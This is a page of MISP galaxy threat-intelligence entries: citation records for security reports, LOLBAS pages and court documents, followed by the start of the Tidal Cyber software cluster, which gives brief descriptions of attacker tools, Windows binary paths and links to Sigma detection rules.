The tag is: misp-galaxy:references="Wikipedia Windows Registry"

Table 16164. Table References

Links

https://en.wikipedia.org/wiki/Windows_Registry

Cylance Reg Persistence Sept 2013

Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Cylance Reg Persistence Sept 2013"

Table 16165. Table References

Links

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

Microsoft WinRM

Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Microsoft WinRM"

Table 16166. Table References

Links

http://msdn.microsoft.com/en-us/library/aa384426

Symantec Windows Rootkits

Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Symantec Windows Rootkits"

Table 16167. Table References

Links

https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf

insecure_reg_perms

Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.

The tag is: misp-galaxy:references="insecure_reg_perms"

Table 16168. Table References

Links

https://itm4n.github.io/windows-registry-rpceptmapper-eop/

Microsoft Windows Scripts

Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Microsoft Windows Scripts"

Table 16169. Table References

Links

https://docs.microsoft.com/scripting/winscript/windows-script-interfaces

Microsoft Security Event 4670

Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.

The tag is: misp-galaxy:references="Microsoft Security Event 4670"

Table 16170. Table References

Links

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670

Windows Log Events

Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Windows Log Events"

Table 16171. Table References

Links

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

winser19_file_overwrite_bug_twitter

Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="winser19_file_overwrite_bug_twitter"

Table 16172. Table References

Links

https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040

Windows Server Containers Are Open

Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here’s How You Can Break Out. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Windows Server Containers Are Open"

Table 16173. Table References

Links

https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/

Sysinternals AppCertDlls Oct 2007

Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Sysinternals AppCertDlls Oct 2007"

Table 16174. Table References

Links

https://forum.sysinternals.com/appcertdlls_topic12546.html

Russinovich Sysinternals

Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.

The tag is: misp-galaxy:references="Russinovich Sysinternals"

Table 16175. Table References

Links

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Microsoft System Services Fundamentals

Microsoft. (2018, February 17). Windows System Services Fundamentals. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="Microsoft System Services Fundamentals"

Table 16176. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx

Technet Windows Time Service

Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="Technet Windows Time Service"

Table 16177. Table References

Links

https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings

Microsoft W32Time May 2017

Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Microsoft W32Time May 2017"

Table 16178. Table References

Links

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

Microsoft W32Time Feb 2018

Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Microsoft W32Time Feb 2018"

Table 16179. Table References

Links

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top

Microsoft CVE-2021-1732 Feb 2021

Microsoft. (2018, February 9). Windows Win32k Elevation of Privilege Vulnerability CVE-2021-1732. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Microsoft CVE-2021-1732 Feb 2021"

Table 16180. Table References

Links

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732

win_xml_evt_log

Forensics Wiki. (2021, June 19). Windows XML Event Log (EVTX). Retrieved September 13, 2021.

The tag is: misp-galaxy:references="win_xml_evt_log"

Table 16181. Table References

Links

https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)

Winexe Github Sept 2013

Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Winexe Github Sept 2013"

Table 16182. Table References

Links

https://github.com/skalkoto/winexe/

Microsoft WinExec

Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft WinExec"

Table 16183. Table References

Links

http://msdn.microsoft.com/en-us/library/ms687393

winget.exe - LOLBAS Project

LOLBAS. (2022, January 3). winget.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="winget.exe - LOLBAS Project"

Table 16184. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Winget/

PreKageo Winhook Jul 2011

Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="PreKageo Winhook Jul 2011"

Table 16185. Table References

Links

https://github.com/prekageo/winhook

Novetta Winnti April 2015

Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Novetta Winnti April 2015"

Table 16186. Table References

Links

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

Chronicle Winnti for Linux May 2019

Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.

The tag is: misp-galaxy:references="Chronicle Winnti for Linux May 2019"

Table 16187. Table References

Links

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

WinRAR Website

WinRAR. (n.d.). WinRAR download free and support: WinRAR. Retrieved December 18, 2023.

The tag is: misp-galaxy:references="WinRAR Website"

Table 16188. Table References

Links

https://www.win-rar.com/

winrm.vbs - LOLBAS Project

LOLBAS. (2018, May 25). winrm.vbs. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="winrm.vbs - LOLBAS Project"

Table 16189. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Winrm/

Microsoft WinVerifyTrust

Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft WinVerifyTrust"

Table 16190. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx

Winword.exe - LOLBAS Project

LOLBAS. (2019, July 19). Winword.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Winword.exe - LOLBAS Project"

Table 16191. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

WinZip Homepage

Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="WinZip Homepage"

Table 16192. Table References

Links

https://www.winzip.com/win/en/

Dell Wiper

Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. Retrieved May 13, 2015.

The tag is: misp-galaxy:references="Dell Wiper"

Table 16193. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/

WireLurker

Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="WireLurker"

Table 16194. Table References

Links

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

Lab52 WIRTE Apr 2019

S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="Lab52 WIRTE Apr 2019"

Table 16195. Table References

Links

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

Kaspersky WIRTE November 2021

Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="Kaspersky WIRTE November 2021"

Table 16196. Table References

Links

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

Cofense RevengeRAT Feb 2019

Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.

The tag is: misp-galaxy:references="Cofense RevengeRAT Feb 2019"

Table 16197. Table References

Links

https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/

CrowdStrike Wizard Spider October 2020

Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.

The tag is: misp-galaxy:references="CrowdStrike Wizard Spider October 2020"

Table 16198. Table References

Links

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

Wlrmdr.exe - LOLBAS Project

LOLBAS. (2022, February 16). Wlrmdr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wlrmdr.exe - LOLBAS Project"

Table 16199. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/

Microsoft WMI Architecture

Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Microsoft WMI Architecture"

Table 16200. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture

LOLBAS Wmic

LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Wmic"

Table 16201. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

Microsoft WMI System Classes

Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Microsoft WMI System Classes"

Table 16202. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes

MalwareBytes WoodyRAT Aug 2022

MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022.

The tag is: misp-galaxy:references="MalwareBytes WoodyRAT Aug 2022"

Table 16203. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild

WorkFolders.exe - LOLBAS Project

LOLBAS. (2021, August 16). WorkFolders.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="WorkFolders.exe - LOLBAS Project"

Table 16204. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/

Confluence Logs

Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Confluence Logs"

Table 16205. Table References

Links

https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html

AppInit Registry

Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.

The tag is: misp-galaxy:references="AppInit Registry"

Table 16206. Table References

Links

https://support.microsoft.com/en-us/kb/197571

ESF_filemonitor

Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple’s Endpoint Security Framework. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="ESF_filemonitor"

Table 16207. Table References

Links

https://objective-see.com/blog/blog_0x48.html

Writing Bad Malware for OSX

Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="Writing Bad Malware for OSX"

Table 16208. Table References

Links

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

Wscript.exe - LOLBAS Project

LOLBAS. (2018, May 25). Wscript.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wscript.exe - LOLBAS Project"

Table 16209. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wscript/

Enigma0x3 PubPrn Bypass

Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Enigma0x3 PubPrn Bypass"

Table 16210. Table References

Links

https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

Wsl.exe - LOLBAS Project

LOLBAS. (2019, June 27). Wsl.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wsl.exe - LOLBAS Project"

Table 16211. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/

Wsreset.exe - LOLBAS Project

LOLBAS. (2019, March 18). Wsreset.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wsreset.exe - LOLBAS Project"

Table 16212. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wsreset/

wt.exe - LOLBAS Project

LOLBAS. (2022, July 27). wt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="wt.exe - LOLBAS Project"

Table 16213. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/wt/

wuauclt.exe - LOLBAS Project

LOLBAS. (2020, September 23). wuauclt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="wuauclt.exe - LOLBAS Project"

Table 16214. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/

XAgentOSX 2017

Robert Falcone. (2017, February 14). XAgentOSX: Sofacy’s Xagent macOS Tool. Retrieved July 12, 2017.

The tag is: misp-galaxy:references="XAgentOSX 2017"

Table 16215. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

XAgentOSX

Robert Falcone. (2017, February 14). XAgentOSX: Sofacy’s Xagent macOS Tool. Retrieved July 12, 2017.

The tag is: misp-galaxy:references="XAgentOSX"

Table 16216. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

Unit42 Xbash Sept 2018

Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Unit42 Xbash Sept 2018"

Table 16217. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

xCmd

Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.

The tag is: misp-galaxy:references="xCmd"

Table 16218. Table References

Links

https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/

xcopy Microsoft

Microsoft. (2023, February 3). xcopy Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="xcopy Microsoft"

Table 16219. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/xcopy

Dragos Xenotime 2018

Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Dragos Xenotime 2018"

Table 16220. Table References

Links

https://dragos.com/resource/xenotime/

gist Arch package compromise 10JUL2018

Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="gist Arch package compromise 10JUL2018"

Table 16221. Table References

Links

https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a

Trend Micro Exposed Docker Server

Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.

The tag is: misp-galaxy:references="Trend Micro Exposed Docker Server"

Table 16222. Table References

Links

https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html

Microsoft xp_cmdshell 2017

Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved September 9, 2019.

The tag is: misp-galaxy:references="Microsoft xp_cmdshell 2017"

Table 16223. Table References

Links

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017

Microsoft XSLT Script Mar 2017

Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using <msxsl:script>. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Microsoft XSLT Script Mar 2017"

Table 16224. Table References

Links

https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script

Xwizard.exe - LOLBAS Project

LOLBAS. (2018, May 25). Xwizard.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Xwizard.exe - LOLBAS Project"

Table 16225. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Xwizard/

Linux kernel Yama

Linux Kernel Archives. (n.d.). Yama Documentation - ptrace_scope. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Linux kernel Yama"

Table 16226. Table References

Links

https://www.kernel.org/doc/Documentation/security/Yama.txt

Mandiant APT29 Microsoft 365 2022

Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.

The tag is: misp-galaxy:references="Mandiant APT29 Microsoft 365 2022"

Table 16227. Table References

Links

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

BlackHat Mac OSX Rootkit

Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven’t known yet. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="BlackHat Mac OSX Rootkit"

Table 16228. Table References

Links

http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf

Malwarebytes DarkComet March 2018

Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Malwarebytes DarkComet March 2018"

Table 16229. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

FireEye Mail CDS 2018

Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="FireEye Mail CDS 2018"

Table 16230. Table References

Links

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf

US District Court Indictment GRU Unit 74455 October 2020

Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.

The tag is: misp-galaxy:references="US District Court Indictment GRU Unit 74455 October 2020"

Table 16231. Table References

Links

https://www.justice.gov/opa/press-release/file/1328521/download

Sophos ZeroAccess

Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.

The tag is: misp-galaxy:references="Sophos ZeroAccess"

Table 16232. Table References

Links

https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf

Mandiant MOVEit Transfer June 2 2023

Nader Zaveri, Jeremy Kennelly, Genevieve Stark, Matthew Mcwhirt, Dan Nutting, Kimberly Goody, Justin Moore, Joe Pisano, Zander Work, Peter Ukhanov, Juraj Sucik, Will Silverstone, Zach Schramm, Greg Blaum, Ollie Styles, Nicholas Bennett, Josh Murchie. (2023, June 2). Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft. Retrieved June 16, 2023.

The tag is: misp-galaxy:references="Mandiant MOVEit Transfer June 2 2023"

Table 16233. Table References

Links

https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft

Kaspersky RTLO Cyber Crime

Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Kaspersky RTLO Cyber Crime"

Table 16234. Table References

Links

https://securelist.com/zero-day-vulnerability-in-telegram/83800/

DOJ APT10 Dec 2018

United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="DOJ APT10 Dec 2018"

Table 16235. Table References

Links

https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion

District Court of NY APT10 Indictment December 2018

US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="District Court of NY APT10 Indictment December 2018"

Table 16236. Table References

Links

https://www.justice.gov/opa/page/file/1122671/download

Zipfldr.dll - LOLBAS Project

LOLBAS. (2018, May 25). Zipfldr.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Zipfldr.dll - LOLBAS Project"

Table 16237. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/

Zlib Github

madler. (2017). zlib. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="Zlib Github"

Table 16238. Table References

Links

https://github.com/madler/zlib

Microsoft Zone.Identifier 2020

Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Microsoft Zone.Identifier 2020"

Table 16239. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8

Sysdig Kinsing November 2020

Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Sysdig Kinsing November 2020"

Table 16240. Table References

Links

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

Tidal Software

Tidal Software Cluster.

Tidal Software is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

3PARA RAT

[3PARA RAT](https://app.tidalcyber.com/software/71d76208-c465-4447-8d6e-c54f142b65a4) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:software="3PARA RAT"

4H RAT

The tag is: misp-galaxy:software="4H RAT"

7-zip - Associated Software

The tag is: misp-galaxy:software="7-zip - Associated Software"

7-Zip

7-Zip is a tool used to compress files into an archive.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="7-Zip"

AADInternals

[AADInternals](https://app.tidalcyber.com/software/3d33fbf5-c21e-4587-ba31-9aeec3cc10c0) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.<sup>[[AADInternals Github](https://app.tidalcyber.com/references/643d3947-c0ec-47c4-bb58-5e546084433c)]</sup><sup>[[AADInternals Documentation](https://app.tidalcyber.com/references/320231a1-4dbe-4eaa-b14d-48de738ba697)]</sup>

The tag is: misp-galaxy:software="AADInternals"

ABK

The tag is: misp-galaxy:software="ABK"

AccCheckConsole.exe - Associated Software

<sup>[[AccCheckConsole.exe - LOLBAS Project](/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]</sup>

The tag is: misp-galaxy:software="AccCheckConsole.exe - Associated Software"

AccCheckConsole

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Verifies UI accessibility requirements

Author: bohops

Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe

Detection: * Sigma: [proc_creation_win_lolbin_susp_acccheckconsole.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml) * IOC: Sysmon Event ID 1 - Process Creation * Analysis: [https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340]([AccCheckConsole.exe - LOLBAS Project(/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]</sup>

The tag is: misp-galaxy:software="AccCheckConsole"

AccountRestore

AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.<sup>[[Security Joes Sockbot March 09 2022](/references/bca2b5c2-bc3b-4504-806e-5c5b6fee96e6)]</sup>

The tag is: misp-galaxy:software="AccountRestore"

Action RAT

[Action RAT](https://app.tidalcyber.com/software/202781a3-d481-4984-9e5a-31caafc20135) is a remote access tool written in Delphi that has been used by [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) since at least December 2021 against Indian and Afghani government personnel.<sup>[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]</sup>

The tag is: misp-galaxy:software="Action RAT"

AddinUtil.exe - Associated Software

<sup>[[AddinUtil.exe - LOLBAS Project](/references/91af546d-0a56-4c17-b292-6257943a8aba)]</sup>

The tag is: misp-galaxy:software="AddinUtil.exe - Associated Software"

AddinUtil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins.

Author: Michael McKinley @MckinleyMike

Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

Detection: * Sigma: [proc_creation_win_addinutil_suspicious_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml) * Sigma: [proc_creation_win_addinutil_uncommon_child_process.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml) * Sigma: [proc_creation_win_addinutil_uncommon_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml) * Sigma: [proc_creation_win_addinutil_uncommon_dir_exec.yml]([AddinUtil.exe - LOLBAS Project(/references/91af546d-0a56-4c17-b292-6257943a8aba)]</sup>

The tag is: misp-galaxy:software="AddinUtil"

AdFind

[AdFind](https://app.tidalcyber.com/software/70559096-2a6b-4388-97e6-c2b16f3be78e) is a free command-line query tool that can be used for gathering information from Active Directory.<sup>[[Red Canary Hospital Thwarted Ryuk October 2020](https://app.tidalcyber.com/references/ae5d4c47-54c9-4f7b-9357-88036c524217)]</sup><sup>[[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]</sup><sup>[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]</sup>

The tag is: misp-galaxy:software="AdFind"

adplus.exe - Associated Software

<sup>[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]</sup>

The tag is: misp-galaxy:software="adplus.exe - Associated Software"

adplus

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging tool included with Windows Debugging Tools

Author: mr.d0x

Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

Detection: * Sigma: [proc_creation_win_lolbin_adplus.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml) * IOC: As a Windows SDK binary, execution on a system may be suspicious<sup>[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]</sup>

The tag is: misp-galaxy:software="adplus"

Advanced IP Scanner

Advanced IP Scanner is a tool used to perform network scans and show network devices.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Advanced IP Scanner"

Advanced Port Scanner

Advanced Port Scanner is a tool used to perform network scans.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Advanced Port Scanner"

AdvancedRun

AdvancedRun is a tool used to enable software execution under user-defined settings.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="AdvancedRun"

Advpack.dll - Associated Software

<sup>[[Advpack.dll - LOLBAS Project](/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]</sup>

The tag is: misp-galaxy:software="Advpack.dll - Associated Software"

Advpack

